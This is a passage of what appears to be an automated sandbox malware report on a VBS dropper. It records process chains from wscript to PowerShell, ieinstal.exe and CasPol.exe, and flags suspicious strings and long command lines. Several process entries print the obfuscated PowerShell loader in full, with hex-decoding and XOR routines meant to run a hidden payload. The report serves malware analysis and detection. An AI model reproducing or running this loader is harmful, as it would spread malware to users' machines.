Ta'LeBUn6re9UpCGu9Sn6Gn9Fa1Br8Mo0Da8Pr8LyCOvBBeBwa7Sk9Fo0Sa8MaBDe9Ev1Af8KaCBa8Oc8Sc8He0NoCObBFoAToCDe8SiBSi9Se1Be8Or0Se9No7Fl8HuAOu9ty5RaBCo6Kr8Sk0dd9Se7As9Ri3Le8laCBr8we6Ou8Di0oc9Be6DaCKaBTeAUnDPu8Se4St8IsBEr8si1Ja8Ng9Li8Sp0FoBDi7Ci8Ex0Vi8st3sl'Sk;De`$FlHPedJalJdcTi4Ki=KlHStTPrBFo Ge'Th9fi6Af9Sy1Af9Re7He8CrCWi8FoBSt8Ov2Be'Bl;Al`$AnHIndaclFocBu5Ta=OvHDeTWhBUn Ca'UdADe2Sy8Pi0In9Af1CaARi8Ha8PrAno8Sl1Py9Du0Gn8Ki9Ud8Po0MuAUnDNe8No4Ud8EpBAc8vi1Bj8Sp9St8Op0An'Af;Se`$OrHBydGrlCicFo6hm=CeHSkTInBHa Di'FaBIn7ApBin1waBbe6Em9Re5sa8No0Wo8Ai6mi8MiCBa8Pa4Sh8El9NoAStBFo8Un4Ko8Om8Lo8Ro0StCfo9ChCco5SyAJuDAg8AfCCo8In1Ps8In0FrAMi7Se9LaCTaBBr6er8TiCAp8Hu2PoCEp9SuCLo5miBRe5Ps9No0Wa8Ko7St8Sa9po8FuCCr8Eg6No'in;Hu`$InHCadUdlRocSt7mi=ReHPrTroBZe da'NeBPa7Ri9Di0Un8chBgn9Ea1Ku8SkCMe8Pr8Su8Di0OvCKa9MoCSa5SwAUd8Un8Bl4si8DiBLy8Un4ur8Gl2Fa8Fi0wh8Ne1Sc'Wa;Dd`$DeHOpdSelNocAz8Tr=ByHDiTSiBPy ev'AvBUn7Di8tr0Om8In3Ma8Fr9pr8ud0Pr8Fe6Tr9Br1Sl8Mi0Gr8In1biAVe1Hy8Sv0Ur8Hv9Pl8Bl0Kl8Ph2Ni8Se4Fa9Fy1Xy8ch0Na'Sa;Dr`$CoHAfdDolVocEn9nd=PiHKoTAsBEf In'PsAPrCGl8MuBFeATa8Fo8Kp0Un8Re8Co8UnAMe9Bl7At9GlCFoAFr8ny8ElAMi8Ek1Fy9St0Ek8Mi9He8Vr0Me'Re;Sv`$ReSActInyKarRekGoeArtunrHynWaeMu0Ov=InHAlTEtBBo Sk'SkAde8Sh9DeCPrASh1Ri8Sc0Va8Re9Ko8Co0sc8Da2St8Af4By9Sy1mi8Af0SuBHo1St9FeCfl9An5Ma8Ob0Cl'tr;Fo`$beSBatDiyAnrSukReeWatOprSunTheSt1Ch=AsHBeTLiBSk Le'SpAma6hs8mo9No8Da4Ha9Sa6ve9Po6stCUn9KoCNe5EnBSq5Pi9St0lo8Rn7Ch8Tw9Ud8BrCHy8fo6UnCfu9roCPh5PrBPa6Tm8Fe0Mi8Or4bl8Pr9Ra8Fa0Pr8Us1GlCLy9
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Damspils = """ReFGruKonNacSktDoiKloUtnHe GrHshTPuBMi Mi{G ud ho Pr HvpflaRurNoaVamSo(st[DeSBotOrrMoiAnnBogPh]Di`$HiHStSBl)Ro;Pa Ni vn Ra Sa`$InBvoyUntAlesisBe Sp=Af UnNBreGrwKr-ByOCabOmjcyeUncBytOr PrbGlyFotPreSt[Be]Av Fa(fo`$AlHDeSSt.MiLQueRinPegBatHahGe Te/Un Ev2Me)Ta;Sm Op Fo St ChFmooKurUn(Sc`$HaiDr=Di0Pr;Is Ly`$HaiPo Sn-OvlKitCo Dy`$FlHSpSpe.GyLSkeOknbrgCatSahAl;Ko Sp`$DeiTr+Da=sk2Ak)La{Ma Sp Wh Ko Gu Va St Ba Pt`$PrBUdySttAueBesUr[Hy`$OdiSt/Kf2Ar]Re Ka=De Ku[AbcFooTonPavToeUdrCotFu]je:Bo:SpTstoSkBGlyGrtPreUr(Su`$UiHDeSNo.caSpruCobOvsPotwerHyiLinTrgCu(St`$MaiMa,Le Di2My)In,Pa Pa1Az6No)Ju;Co Ba Rn`$GaBOpyTitSteBosDi[Au`$EliAd/As2Ma]Pa Ve=Tr Sh(Ci`$SpBAayTetOxeBosIn[Ra`$MaiOm/Ba2Am]Bo Do-TibDixGloMorPa En2Fr0ba1Om)He;Au Vg Re Mr as}Mi Mi[SuSKktTurspiFanMagOv]En[GrSInyHysCltCaeStmIn.StTPoeUdxUntKo.reEAfnThcUnoTrdariUnnRegTa]Be:Ka:OvASlSTrCPaIExIBr.DiGSaehatMiSOutAlrSpiTanSugBi(me`$ElbInyEttIneMasSu)Ci;By}Mi`$InRHaeGrcOvaGilSycTeiOptRhrRiaHitdieMe0Pi=LiHomTExBOv Sn'Ho9ThASnBVi0VaBAaARaBCiDplACoCGyAVo4OpEIn7WeAKoDPeAEx5OpAFr5Cu'bi;Ge`$EmRAfeBycDiaEmlUncheiAptrirExaHetsteBe1lb=GuHDaTGeBSk Le'Di8Rg4LyApr0InAViASpBReBBoACo6SiBSlAKoAFi6ScABrFMiBLiDSiEMo7Be9laEUnASt0BiAKo7WrFCaAUnFStBHoECh7Ra9ChCPaABe7SkBadAPaATr8HuAKeFskADoCkn8Sk7MaAPr8RoBCrDFoAPe0MeBLaFScAJuCNo8Te4BoAReCSpBDiDdeAun1BiATi6TuAWeDHeBIlARi'Im;Ga`$HoRIseMicCaaChlPocFoiTrtberDeaFltFoeXx2ma=RuHMeTOvBNo Pi'Ru8LyERaAObCMyBAnDUn9In9AnBIdBbaAHy6WiAspAUn8Pa8JoABiDFlASvDFaBDaBCiAbiCHaBjaAPrBanAFo'Ju;Sa`$MtRThehicHyaUnlCycSeiDetNorSnaEbtTeeDy3Ge=urHMaTPhBBu Ex'Si9AdABeBNa0OlBMiASkBBoDBrAMuCUnARu4HoECh7Be9SyBFoBusCOpAUn7FaBUnDSpAOp0haAAn4KiAReCSrESm7Ga8Ro0DoAGl7TiBfoDGlASiCYoBSuBDeAJo6FlBAi9Af9MaAKiASpCSaBFjBGaBFrFBnAsw0OvAWeACuAteCToBLaAOuEFo7Sa8Se1InATi8SpAEc7DeAFoDSaAOp5FoAAlCGi9CyBFiAReCKlADrFFe'Ko;Be`$ToRMaePrcNoaInlRecEtiMatInrWiaKotAleEx4Ga=FoHTiTBaBWe Un'OvBTrAHeBinDIlBPyBFaAEv0KoABe7AmAStEUn'Fo;Co`$SkRSeeVacobabrlincRyiDetGrrWhaChtFoeRa5Ba=ccHSpTAnBPr Au'In8VgEFnAPaCYpBMoDOm8Kl4RaAMu6DeACoDHuBHiCSnAHy5LoAGeCUd8Th1TrAFl8InAEn7TaAUnDBuAel5AfAKaCRe'Un;Af`$GaRDeeBocmyaMelMacKviOptMirHeaTrtPaeSa6Pl=HeHOmTKiBUl Ea'Ku9svBUb9LiDGe9NeASuBFe9foANaClaAInAHeAFy0FoAKh8CaATr5un8To7FlAEn8KoAHe4DoABiCdiEBl5HiEOi9Ha8Po1MaAfl0alATaDDiACiCAf8GiBSpBCa0ra9BuADuAAe0UdACaESjETr5GoEHa9Op9Ma9StBexCWoAStBKrARn5BeAFl0AmAarAAf'Uk;Jo`$TeRBaeRecNaaHolDrcJeiOmtImrOuaNotSoeKo7Re=SuHXyTRuBTa Tr'na9LiBFoBScCHuADe7AaBGrDJuACa0foAGi4AnAReCGlEYo5MaEKa9Or8Mi4deAIn8MoASj7EuAth8FuAFoEimAMeCUnABeDGi'Ty;do`$TeRFleVacInaMelUocPuiOvtWirLeaKntMneAn8St=TiHPaTPaBSt St'Tn9LiBChANoCLyAJoFLyAAs5DiAFaCViADmABoBCaDOpALvCGaAHiDPr8HaDVaAPoCOvAPo5TaANoCcrAPrEScACi8MeBApDnoAKaCLy'St;Un`$SmRFieSicSeaSelDicPaivatRarTeaPotReeDr9Ov=MeHDoTSiBSt ca'Ta8os0GlANo7Ro8Ch4PeATrCreAOp4BeASt6aaBAaBIlBAl0En8st4HoAFe6YeARaDlsBExCUnAUn5PrAPoCde'Fo;Ro`$StDnoeGomFgaSugcynKieretEviAmzPaaLmbBllUdePl0Co=PaHAlTAgBKi ma'Ba8Dr4noBSy0Sa8ToDHuAFrCTeAT
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Badeanstalt = """reFLiuEfnBrcExtApiHjoStnBu HyHFlTDuBSp su{Hi Cl An Pa BapinaCarZiaSomVo(Cz[PaSDetalrCaiennOugDe]Ca`$UdHBaSUd)Fr;Ag At Ud Ho Af`$UsBeuyAktNoePasBo Sa=Sn ThNAneNowBo-MuOGrbEpjLoeDdcBetHu TobPayVrtSeeLa[Al]Po Bd(Me`$VaHTnSDe.ReLPeeNonVegMatunhSl Re/Sk Di2Gi)Ko;Un ge Ma Is GeFFloLerWi(fe`$HaiOp=om0Pe;Fu Ma`$PhiDo Ge-MaltitSe Fa`$SyHBeSBa.DoLUneDenScgDotUnhCa;Do Un`$reiom+Re=Be2Du)Va{Fl Pl Re Ad Ot ta Sp Sk Ho`$DoBFeyDetLeegasSm[Fi`$geiAf/na2De]Od Ge=Sa Tr[RecSkoUnnLivKresirOrtBr]Il:Me:DaTDioDiBBoyPatGleSu(Po`$UsHHeSPh.boSFruAfbNesMatUnrPriPonUngLa(Il`$StiPa,Su Jo2Po)Ca,Bl Af1Sn6Du)No;Ma Te Un`$miBKryPrtCheGtsPa[Du`$SyiUn/Tr2Fi]Mi Ta=Ha Ah(Fo`$SiBbiyIntOpeovsOl[Kb`$spiHe/Ar2Fr]Fe Ci-FrbRexEnoPhrTi Hy2St2Re9La)lo;so Le De Ca Vr}Re Un[MuSkutSqrLaiApnNogBl]Pe[MaSChyInsDetpaeNemSt.VaTBaeKaxIbtBi.ReEManPlcGeourdPriMonPrgSy]Si:Ko:RaAUdSAkCWaIFoIsa.MoGBaeButTaSGutUnrFriUlnIngBa(Ba`$FobSeyPitTheAnsId)li;Bl}Ga`$DeHBrdSalUncIr0Sk=KrHOuTBeBAf Ry'BeBRe6te9SpCBe9Be6Pr9Gr1js8Et0Am8In8SeCEnBCa8co1In8Ta9Pr8Cr9De'Sy;Lu`$plHRvdaflFocIn1De=TrHDiTZiBVe Un'FeAKr8Re8TaCDe8Sl6Gr9Ag7is8XyASv9Sp6Sh8CaAHe8De3Bl9An1unCTiBteBAb2Ha8SmCUr8SuBCuDbu6LkDTi7MaCMeBSeBDe0As8TrBCh9Ah6Me8To4Pr8Ne3Fr8In0boAReBRa8st4Ti9Ve1un8ApCOp9dk3Bi8Co0SuACl8An8en0Un9In1Mo8DeDAn8PeAUd8Wu1Ra9Ca6Ba'Fo;El`$LoHBldNolSucBo2Ne=TnHBlTUnBSp Ne'siAFi2Sk8Ti0Di9Ul1tyBLo5Ob9Fi7no8ByACe8An6PoALa4Da8Bi1Ka8Im1Wh9Gt7lo8Ge0Rr9Br6Br9Di6Ar'Fl;gr`$CyHEidArlblcPr3pr=OvHenTnoBCo Ta'LeBUn6re9UpCGu9Sn6Gn9Fa1Br8Mo0Da8Pr8LyCOvBBeBwa7Sk9Fo0Sa8MaBDe9Ev1Af8KaCBa8Oc8Sc8He0NoCObBFoAToCDe8SiBSi9Se1Be8Or0Se9No7Fl8HuAOu9ty5RaBCo6Kr8Sk0dd9Se7As9Ri3Le8laCBr8we6Ou8Di0oc9Be6DaCKaBTeAUnDPu8Se4St8IsBEr8si1Ja8Ng9Li8Sp0FoBDi7Ci8Ex0Vi8st3sl'Sk;De`$FlHPedJalJdcTi4Ki=KlHStTPrBFo Ge'Th9fi6Af9Sy1Af9Re7He8CrCWi8FoBSt8Ov2Be'Bl;Al`$AnHIndaclFocBu5Ta=OvHDeTWhBUn Ca'UdADe2Sy8Pi0In9Af1CaARi8Ha8PrAno8Sl1Py9Du0Gn8Ki9Ud8Po0MuAUnDNe8No4Ud8EpBAc8vi1Bj8Sp9St8Op0An'Af;Se`$OrHBydGrlCicFo6hm=CeHSkTInBHa Di'FaBIn7ApBin1waBbe6Em9Re5sa8No0Wo8Ai6mi8MiCBa8Pa4Sh8El9NoAStBFo8Un4Ko8Om8Lo8Ro0StCfo9ChCco5SyAJuDAg8AfCCo8In1Ps8In0FrAMi7Se9LaCTaBBr6er8TiCAp8Hu2PoCEp9SuCLo5miBRe5Ps9No0Wa8Ko7St8Sa9po8FuCCr8Eg6No'in;Hu`$InHCadUdlRocSt7mi=ReHPrTroBZe da'NeBPa7Ri9Di0Un8chBgn9Ea1Ku8SkCMe8Pr8Su8Di0OvCKa9MoCSa5SwAUd8Un8Bl4si8DiBLy8Un4ur8Gl2Fa8Fi0wh8Ne1Sc'Wa;Dd`$DeHOpdSelNocAz8Tr=ByHDiTSiBPy ev'AvBUn7Di8tr0Om8In3Ma8Fr9pr8ud0Pr8Fe6Tr9Br1Sl8Mi0Gr8In1biAVe1Hy8Sv0Ur8Hv9Pl8Bl0Kl8Ph2Ni8Se4Fa9Fy1Xy8ch0Na'Sa;Dr`$CoHAfdDolVocEn9nd=PiHKoTAsBEf In'PsAPrCGl8MuBFeATa8Fo8Kp0Un8Re8Co8UnAMe9Bl7At9GlCFoAFr8ny8ElAMi8Ek1Fy9St0Ek8Mi9He8Vr0Me'Re;Sv`$ReSActInyKarRekGoeArtunrHynWaeMu0Ov=InHAlTEtBBo Sk'SkAde8Sh9DeCPrASh1Ri8Sc0Va8Re9Ko8Co0sc8Da2St8Af4By9Sy1mi8Af0SuBHo1St9FeCfl9An5Ma8Ob0Cl'tr;Fo`$beSBatDiyAnrSukReeWatOprSunTheSt1Ch=AsHBeTLiBSk Le'SpAma6hs8mo9No8Da4Ha9Sa6ve9Po6stCUn9KoCNe5EnBSq5Pi9St0lo8Rn7Ch8Tw9Ud8BrCHy8fo6UnCfu9roCPh5PrBPa6Tm8Fe0Mi8Or4bl8Pr9Ra8Fa0Pr8Us1GlCLy9
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Damspils = """ReFGruKonNacSktDoiKloUtnHe GrHshTPuBMi Mi{G ud ho Pr HvpflaRurNoaVamSo(st[DeSBotOrrMoiAnnBogPh]Di`$HiHStSBl)Ro;Pa Ni vn Ra Sa`$InBvoyUntAlesisBe Sp=Af UnNBreGrwKr-ByOCabOmjcyeUncBytOr PrbGlyFotPreSt[Be]Av Fa(fo`$AlHDeSSt.MiLQueRinPegBatHahGe Te/Un Ev2Me)Ta;Sm Op Fo St ChFmooKurUn(Sc`$HaiDr=Di0Pr;Is Ly`$HaiPo Sn-OvlKitCo Dy`$FlHSpSpe.GyLSkeOknbrgCatSahAl;Ko Sp`$DeiTr+Da=sk2Ak)La{Ma Sp Wh Ko Gu Va St Ba Pt`$PrBUdySttAueBesUr[Hy`$OdiSt/Kf2Ar]Re Ka=De Ku[AbcFooTonPavToeUdrCotFu]je:Bo:SpTstoSkBGlyGrtPreUr(Su`$UiHDeSNo.caSpruCobOvsPotwerHyiLinTrgCu(St`$MaiMa,Le Di2My)In,Pa Pa1Az6No)Ju;Co Ba Rn`$GaBOpyTitSteBosDi[Au`$EliAd/As2Ma]Pa Ve=Tr Sh(Ci`$SpBAayTetOxeBosIn[Ra`$MaiOm/Ba2Am]Bo Do-TibDixGloMorPa En2Fr0ba1Om)He;Au Vg Re Mr as}Mi Mi[SuSKktTurspiFanMagOv]En[GrSInyHysCltCaeStmIn.StTPoeUdxUntKo.reEAfnThcUnoTrdariUnnRegTa]Be:Ka:OvASlSTrCPaIExIBr.DiGSaehatMiSOutAlrSpiTanSugBi(me`$ElbInyEttIneMasSu)Ci;By}Mi`$InRHaeGrcOvaGilSycTeiOptRhrRiaHitdieMe0Pi=LiHomTExBOv Sn'Ho9ThASnBVi0VaBAaARaBCiDplACoCGyAVo4OpEIn7WeAKoDPeAEx5OpAFr5Cu'bi;Ge`$EmRAfeBycDiaEmlUncheiAptrirExaHetsteBe1lb=GuHDaTGeBSk Le'Di8Rg4LyApr0InAViASpBReBBoACo6SiBSlAKoAFi6ScABrFMiBLiDSiEMo7Be9laEUnASt0BiAKo7WrFCaAUnFStBHoECh7Ra9ChCPaABe7SkBadAPaATr8HuAKeFskADoCkn8Sk7MaAPr8RoBCrDFoAPe0MeBLaFScAJuCNo8Te4BoAReCSpBDiDdeAun1BiATi6TuAWeDHeBIlARi'Im;Ga`$HoRIseMicCaaChlPocFoiTrtberDeaFltFoeXx2ma=RuHMeTOvBNo Pi'Ru8LyERaAObCMyBAnDUn9In9AnBIdBbaAHy6WiAspAUn8Pa8JoABiDFlASvDFaBDaBCiAbiCHaBjaAPrBanAFo'Ju;Sa`$MtRThehicHyaUnlCycSeiDetNorSnaEbtTeeDy3Ge=urHMaTPhBBu Ex'Si9AdABeBNa0OlBMiASkBBoDBrAMuCUnARu4HoECh7Be9SyBFoBusCOpAUn7FaBUnDSpAOp0haAAn4KiAReCSrESm7Ga8Ro0DoAGl7TiBfoDGlASiCYoBSuBDeAJo6FlBAi9Af9MaAKiASpCSaBFjBGaBFrFBnAsw0OvAWeACuAteCToBLaAOuEFo7Sa8Se1InATi8SpAEc7DeAFoDSaAOp5FoAAlCGi9CyBFiAReCKlADrFFe'Ko;Be`$ToRMaePrcNoaInlRecEtiMatInrWiaKotAleEx4Ga=FoHTiTBaBWe Un'OvBTrAHeBinDIlBPyBFaAEv0KoABe7AmAStEUn'Fo;Co`$SkRSeeVacobabrlincRyiDetGrrWhaChtFoeRa5Ba=ccHSpTAnBPr Au'In8VgEFnAPaCYpBMoDOm8Kl4RaAMu6DeACoDHuBHiCSnAHy5LoAGeCUd8Th1TrAFl8InAEn7TaAUnDBuAel5AfAKaCRe'Un;Af`$GaRDeeBocmyaMelMacKviOptMirHeaTrtPaeSa6Pl=HeHOmTKiBUl Ea'Ku9svBUb9LiDGe9NeASuBFe9foANaClaAInAHeAFy0FoAKh8CaATr5un8To7FlAEn8KoAHe4DoABiCdiEBl5HiEOi9Ha8Po1MaAfl0alATaDDiACiCAf8GiBSpBCa0ra9BuADuAAe0UdACaESjETr5GoEHa9Op9Ma9StBexCWoAStBKrARn5BeAFl0AmAarAAf'Uk;Jo`$TeRBaeRecNaaHolDrcJeiOmtImrOuaNotSoeKo7Re=SuHXyTRuBTa Tr'na9LiBFoBScCHuADe7AaBGrDJuACa0foAGi4AnAReCGlEYo5MaEKa9Or8Mi4deAIn8MoASj7EuAth8FuAFoEimAMeCUnABeDGi'Ty;do`$TeRFleVacInaMelUocPuiOvtWirLeaKntMneAn8St=TiHPaTPaBSt St'Tn9LiBChANoCLyAJoFLyAAs5DiAFaCViADmABoBCaDOpALvCGaAHiDPr8HaDVaAPoCOvAPo5TaANoCcrAPrEScACi8MeBApDnoAKaCLy'St;Un`$SmRFieSicSeaSelDicPaivatRarTeaPotReeDr9Ov=MeHDoTSiBSt ca'Ta8os0GlANo7Ro8Ch4PeATrCreAOp4BeASt6aaBAaBIlBAl0En8st4HoAFe6YeARaDlsBExCUnAUn5PrAPoCde'Fo;Ro`$StDnoeGomFgaSugcynKieretEviAmzPaaLmbBllUdePl0Co=PaHAlTAgBKi ma'Ba8Dr4noBSy0Sa8ToDHuAFrCTeAT
            Potential malicious VBS script found (suspicious strings)
            Source: Initial file: Fusendes.ShellExecute Nske,Br0, "", "", 0
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeDropped file: Steuroperens.ShellExecute Meninger,Ma5, "", "", 0Jump to dropped file
            Very long command line found
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 17542
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 5700
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 19424
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 17542
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 5700
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 19424
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 8_2_032279D3
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_07502A18
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_07507430
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_07507420
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_07510040
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0751EFF8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_07517798
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_07510040
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0751EFE8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_07526EE8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00B73068
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00B73D88
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00B7FA20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00B73650
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00B7C3B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00B7EDD7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00B7E6F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00E26EBC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_1D636FE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_1D63A1E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_1D639910
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_1D6395C8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 1D63D140 appears 54 times
            Source: IMG_2022028022-0120.vbsInitial sample: Strings found which are bigger than 50
            Source: C:\Windows\System32\wscript.exeSection loaded: edgegdi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeSection loaded: edgegdi.dll
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edgegdi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: edgegdi.dll
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG_2022028022-0120.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Badeanstalt = """reFLiuEfnBrcExtApiHjoStnBu HyHFlTDuBSp su{Hi Cl An Pa BapinaCarZiaSomVo(Cz[PaSDetalrCaiennOugDe]Ca`$UdHBaSUd)Fr;Ag At Ud Ho Af`$UsBeuyAktNoePasBo Sa=Sn ThNAneNowBo-MuOGrbEpjLoeDdcBetHu TobPayVrtSeeLa[Al]Po Bd(Me`$VaHTnSDe.ReLPeeNonVegMatunhSl Re/Sk Di2Gi)Ko;Un ge Ma Is GeFFloLerWi(fe`$HaiOp=om0Pe;Fu Ma`$PhiDo Ge-MaltitSe Fa`$SyHBeSBa.DoLUneDenScgDotUnhCa;Do Un`$reiom+Re=Be2Du)Va{Fl Pl Re Ad Ot ta Sp Sk Ho`$DoBFeyDetLeegasSm[Fi`$geiAf/na2De]Od Ge=Sa Tr[RecSkoUnnLivKresirOrtBr]Il:Me:DaTDioDiBBoyPatGleSu(Po`$UsHHeSPh.boSFruAfbNesMatUnrPriPonUngLa(Il`$StiPa,Su Jo2Po)Ca,Bl Af1Sn6Du)No;Ma Te Un`$miBKryPrtCheGtsPa[Du`$SyiUn/Tr2Fi]Mi Ta=Ha Ah(Fo`$SiBbiyIntOpeovsOl[Kb`$spiHe/Ar2Fr]Fe Ci-FrbRexEnoPhrTi Hy2St2Re9La)lo;so Le De Ca Vr}Re Un[MuSkutSqrLaiApnNogBl]Pe[MaSChyInsDetpaeNemSt.VaTBaeKaxIbtBi.ReEManPlcGeourdPriMonPrgSy]Si:Ko:RaAUdSAkCWaIFoIsa.MoGBaeButTaSGutUnrFriUlnIngBa(Ba`$FobSeyPitTheAnsId)li;Bl}Ga`$DeHBrdSalUncIr0Sk=KrHOuTBeBAf Ry'BeBRe6te9SpCBe9Be6Pr9Gr1js8Et0Am8In8SeCEnBCa8co1In8Ta9Pr8Cr9De'Sy;Lu`$plHRvdaflFocIn1De=TrHDiTZiBVe Un'FeAKr8Re8TaCDe8Sl6Gr9Ag7is8XyASv9Sp6Sh8CaAHe8De3Bl9An1unCTiBteBAb2Ha8SmCUr8SuBCuDbu6LkDTi7MaCMeBSeBDe0As8TrBCh9Ah6Me8To4Pr8Ne3Fr8In0boAReBRa8st4Ti9Ve1un8ApCOp9dk3Bi8Co0SuACl8An8en0Un9In1Mo8DeDAn8PeAUd8Wu1Ra9Ca6Ba'Fo;El`$LoHBldNolSucBo2Ne=TnHBlTUnBSp Ne'siAFi2Sk8Ti0Di9Ul1tyBLo5Ob9Fi7no8ByACe8An6PoALa4Da8Bi1Ka8Im1Wh9Gt7lo8Ge0Rr9Br6Br9Di6Ar'Fl;gr`$CyHEidArlblcPr3pr=OvHenTnoBCo Ta'LeBUn6re9UpCGu9Sn6Gn9Fa1Br8Mo0Da8Pr8LyCOvBBeBwa7Sk9Fo0Sa8MaBDe9Ev1Af8KaCBa8Oc8Sc8He0NoCObBFoAToCDe8SiBSi9Se1Be8Or0Se9No7Fl8HuAOu9ty5RaBCo6Kr8Sk0dd9Se7As9Ri3Le8laCBr8we6Ou8Di0oc9Be6DaCKaBTeAUnDPu8Se4St8IsBEr8si1Ja8Ng9Li8Sp0FoBDi7Ci8Ex0Vi8st3sl'Sk;De`$FlHPedJalJdcTi4Ki=KlHStTPrBFo Ge'Th9fi6Af9Sy1Af9Re7He8CrCWi8FoBSt8Ov2Be'Bl;Al`$AnHIndaclFocBu5Ta=OvHDeTWhBUn Ca'UdADe2Sy8Pi0In9Af1CaARi8Ha8PrAno8Sl1Py9Du0Gn8Ki9Ud8Po0MuAUnDNe8No4Ud8EpBAc8vi1Bj8Sp9St8Op0An'Af;Se`$OrHBydGrlCicFo6hm=CeHSkTInBHa Di'FaBIn7ApBin1waBbe6Em9Re5sa8No0Wo8Ai6mi8MiCBa8Pa4Sh8El9NoAStBFo8Un4Ko8Om8Lo8Ro0StCfo9ChCco5SyAJuDAg8AfCCo8In1Ps8In0FrAMi7Se9LaCTaBBr6er8TiCAp8Hu2PoCEp9SuCLo5miBRe5Ps9No0Wa8Ko7St8Sa9po8FuCCr8Eg6No'in;Hu`$InHCadUdlRocSt7mi=ReHPrTroBZe da'NeBPa7Ri9Di0Un8chBgn9Ea1Ku8SkCMe8Pr8Su8Di0OvCKa9MoCSa5SwAUd8Un8Bl4si8DiBLy8Un4ur8Gl2Fa8Fi0wh8Ne1Sc'Wa;Dd`$DeHOpdSelNocAz8Tr=ByHDiTSiBPy ev'AvBUn7Di8tr0Om8In3Ma8Fr9pr8ud0Pr8Fe6Tr9Br1Sl8Mi0Gr8In1biAVe1Hy8Sv0Ur8Hv9Pl8Bl0Kl8Ph2Ni8Se4Fa9Fy1Xy8ch0Na'Sa;Dr`$CoHAfdDolVocEn9nd=PiHKoTAsBEf In'PsAPrCGl8MuBFeATa8Fo8Kp0Un8Re8Co8UnAMe9Bl7At9GlCFoAFr8ny8ElAMi8Ek1Fy9St0Ek8Mi9He8Vr0Me'Re;Sv`$ReSActInyKarRekGoeArtunrHynWaeMu0Ov=InHAlTEtBBo Sk'SkAde8Sh9DeCPrASh1Ri8Sc0Va8Re9Ko8Co0sc8Da2St8Af4By9Sy1mi8Af0SuBHo1St9FeCfl9An5Ma8Ob0Cl'tr;Fo`$beSBatDiyAnrSukReeWatOprSunTheSt1Ch=AsHBeTLiBSk Le'SpAma6hs8mo9No8Da4Ha9Sa6ve9Po6stCUn9KoCNe5EnBSq5Pi9St0lo8Rn7Ch8Tw9Ud8BrCHy8fo6UnCfu9roCPh5PrBPa6Tm8Fe0Mi8Or4bl8Pr9Ra8Fa0Pr8Us1GlCLy9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
